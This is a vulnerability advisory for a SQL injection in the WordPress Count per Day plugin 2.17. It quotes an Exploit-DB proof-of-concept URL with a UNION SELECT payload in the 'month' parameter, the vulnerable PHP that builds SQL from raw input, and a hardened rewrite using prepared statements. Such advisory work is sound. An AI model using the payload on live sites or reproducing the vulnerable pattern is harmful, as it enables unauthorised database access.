Vendor: Count per Day
By: Miroslav Stampar
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Count per Day
Affected Version From: 2.17
Affected Version To: 2.17
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:count_per_day:2.17
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2011

WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'month' parameter of the 'notes.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the context of the application. This can allow the attacker to bypass authentication and gain access to the application data.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. All input data should be validated and filtered, and special characters should be escaped or removed.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/count-per-day.2.17.zip
# Version: 2.17 (tested)
# Note: Authors have done one of the dirtiest things I've seen in a while :)
#       I've warned them 2 weeks ago about the vulnerability
#       They've silently updated the affected v2.17 like nothing happened
#       No mention of "security" fix in Changelog

---
PoC
---
http://www.site.com/wp-content/plugins/count-per-day/notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20

---------------
Vulnerable code
---------------
if ( isset($_POST['month']) )
	$month = $_POST['month']; // they've put (int) here
else if ( isset($_GET['month']) )
	$month = $_GET['month'];  // they've put (int) here
else	
	$month = date_i18n('m');
...
$where = '';
if ( $month )
	$where .= " AND MONTH(date) = $month "; 
if ( $year )
	$where .= " AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);
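The following is an added example, not the plugin's code and not part of the Exploit-DB entry: a hardened rewrite of the notes.php fragment above that also applies the mitigation paragraph (validate the input, and keep untrusted data out of the SQL string). It assumes it runs inside WordPress, so `$wpdb`, `$wpdb->prefix`, `$wpdb->prepare()` and `date_i18n()` are available; the `cpd_valid_month`, `cpd_valid_year` and `cpd_request_param` helper names are hypothetical. The fragment on the page does not show where `$year` comes from, so this assumes it is read the same way as `$month`.

```php
<?php
// Added example, not the plugin's own code: a hardened rewrite of the
// notes.php fragment quoted above. Assumes it runs inside WordPress, so
// $wpdb, $wpdb->prefix, $wpdb->prepare() and date_i18n() exist; the
// cpd_* helper names are hypothetical.

/**
 * Validate a calendar month taken from the request.
 * Returns an int in 1..12, or null for anything else. The (int) cast the
 * authors added is what stops the injection; the digit check and range
 * check additionally reject values such as "-1" or "13" instead of
 * querying for them.
 */
function cpd_valid_month( $raw ) {
    if ( ! is_scalar( $raw ) ) {           // rejects arrays sent as month[]=...
        return null;
    }
    if ( ! preg_match( '/^\d{1,2}\z/', (string) $raw ) ) {
        return null;
    }
    $m = (int) $raw;
    return ( $m >= 1 && $m <= 12 ) ? $m : null;
}

/** Same idea for the year: exactly four digits, otherwise null. */
function cpd_valid_year( $raw ) {
    if ( ! is_scalar( $raw ) || ! preg_match( '/^\d{4}\z/', (string) $raw ) ) {
        return null;
    }
    return (int) $raw;
}

/** Read a request parameter the way the plugin does: POST first, then GET. */
function cpd_request_param( $name ) {
    if ( isset( $_POST[ $name ] ) ) {
        return $_POST[ $name ];
    }
    if ( isset( $_GET[ $name ] ) ) {
        return $_GET[ $name ];
    }
    return null;
}

$raw_month = cpd_request_param( 'month' );
$month     = ( null === $raw_month ) ? (int) date_i18n( 'm' ) : cpd_valid_month( $raw_month );

// Assumption: the original fragment does not show how $year is obtained;
// here it is read the same way as $month.
$raw_year = cpd_request_param( 'year' );
$year     = ( null === $raw_year ) ? null : cpd_valid_year( $raw_year );

// Build the query with %d placeholders and let $wpdb->prepare() bind the
// values, instead of concatenating $month and $year into the SQL string.
// $wpdb->prefix is WordPress's table prefix (the fragment used the
// $table_prefix global from wp-config.php).
global $wpdb;
$sql    = 'SELECT * FROM ' . $wpdb->prefix . 'cpd_notes WHERE 1=1';
$params = array();
if ( null !== $month ) {
    $sql     .= ' AND MONTH(date) = %d';
    $params[] = $month;
}
if ( null !== $year ) {
    $sql     .= ' AND YEAR(date) = %d';
    $params[] = $year;
}
$sql .= ' ORDER BY date DESC';

// prepare() with no placeholders triggers a _doing_it_wrong notice in
// WordPress, so only call it when at least one value was bound.
$query = $params ? $wpdb->prepare( $sql, $params ) : $sql;
$notes = $wpdb->get_results( $query, ARRAY_A );
```

With this rewrite the PoC value for `month` never reaches the database: `cpd_valid_month()` returns null for it, so the month filter is simply dropped rather than being spliced into the query. If silently ignoring a bad parameter is undesirable, the same check can instead return an error response; the point is that the only values that reach `MONTH(date) = %d` are integers bound by `$wpdb->prepare()`.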